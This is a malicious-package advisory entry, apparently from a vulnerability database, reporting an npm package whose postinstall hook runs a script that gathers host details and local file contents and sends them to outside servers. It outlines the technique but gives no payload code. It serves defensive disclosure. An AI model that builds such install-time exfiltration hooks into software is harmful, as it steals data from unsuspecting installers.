MAL-2026-5982

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (1d079b30dbb30db1a61acddcd094d2e7e67e7ef466d624e4ad2392edc9d9203e) On install, package.json runs `postinstall: node run.js`. run.js imports os, fs, http, https, and child_process and at runtime collects host identifiers (os.hostname(), os.platform()) and reads files from the filesystem (fs.existsSync / fs.readFileSync), then issues outbound HTTP/HTTPS requests including POST calls (run.js lines 322, 329) and GET / http.get fetches (lines 38, 190). The postinstall lifecycle hook causes this code to execute automatically on `npm install` without consumer interaction, exposing installer host information and local file contents to attacker-controlled network destinations. The package name (random suffix `-77d4`) and the absence of any documented purpose are consistent with a disposable exfiltration lure rather than a legitimate library.